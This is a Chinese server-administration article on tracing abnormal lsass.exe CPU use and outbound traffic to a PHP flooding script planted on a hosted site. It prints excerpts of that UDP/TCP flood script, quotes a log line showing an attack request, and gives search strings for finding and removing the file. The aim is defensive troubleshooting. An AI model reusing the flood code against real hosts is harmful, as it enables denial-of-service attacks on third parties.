Windows服務(wù)器上lsass.exe進(jìn)程CPU使用率異常問(wèn)題排查方法

更新時(shí)間：2014年08月14日 08:46:10 投稿：junjie

這篇文章主要介紹了Windows服務(wù)器上lsass.exe進(jìn)程CPU使用率異常問(wèn)題排查方法,一般這個(gè)情況是發(fā)起了對(duì)外攻擊造成的,也就是你的服務(wù)器可能已經(jīng)淪為肉機(jī),需要的朋友可以參考下

近期有幾臺(tái)服務(wù)器相繼出現(xiàn) lsass.exe 占用CPU過(guò)高，也不算太高，而且過(guò)了一段時(shí)間又會(huì)恢復(fù)正常，CPU過(guò)高直接造成網(wǎng)站打開很慢，周而反復(fù)。

在CPU跑高的時(shí)候，伴隨著一個(gè)現(xiàn)像就是網(wǎng)絡(luò)的浮動(dòng)，有時(shí)候上傳居然達(dá)到了30M - 90M/s，對(duì)外攻擊，第一時(shí)間就想到有可能是這個(gè)原因，那具體怎么查呢？

常見(jiàn)的對(duì)外文件，這東西網(wǎng)上搜一下就能找到。

復(fù)制代碼代碼如下:

<?php

set_time_limit(86400);

ignore_user_abort(True);

$packets = 0;

$http = $_REQUEST['http'];

$rand = $_REQUEST['exit'];

$exec_time = $_REQUEST['time'];

........

echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat'];

exit;

}

echo "Php 2012 Terminator";

exit;

}

for($i=0;$i<65535;$i++)

{

$out .= "X";

}

/........

}

$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);

if($fp)

{

fwrite($fp, $out);

fclose($fp);

}

}

else

if($rand==500)

while(1)

{

$packets++;

if(time() > $max_time){

break;

}

$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);

if($fp)

{

fwrite($fp, $out);

fclose($fp);

}

}

else

while(1)

{

$packets++;

if(time() > $max_time){

break;

}

$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);

if($fp)

{

fwrite($fp, $out);

fclose($fp);

}

}

?>

那要如何定位到是哪個(gè)站呢？
你可以打開日志
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打開今天時(shí)間的文件,
里面有類似這樣的記錄:

復(fù)制代碼代碼如下:

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1

最后三項(xiàng) 783 Disabled 30_FreeHost_1
783就是這個(gè)站在IIS中的ID
30_FreeHost_1就是所在池

解決辦法:

找到這個(gè)站點(diǎn)，接下來(lái)想要解決就好辦了，如果條件允許，可以直接禁用掉fsockopen這個(gè)函數(shù)，當(dāng)然這個(gè)大部份情況下是不適用的。
那就去這個(gè)站點(diǎn)的根止錄下找找吧。

復(fù)制代碼代碼如下:

$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);

可以借助一些工具，查找上面這句話，或是查找$fp = fsockopen，這樣其本上攻擊文件就無(wú)所遁形了，當(dāng)然不要?jiǎng)h除了正常的郵件發(fā)送文件，最后重啟下服務(wù)，嗯，不卡了。

您可能感興趣的文章: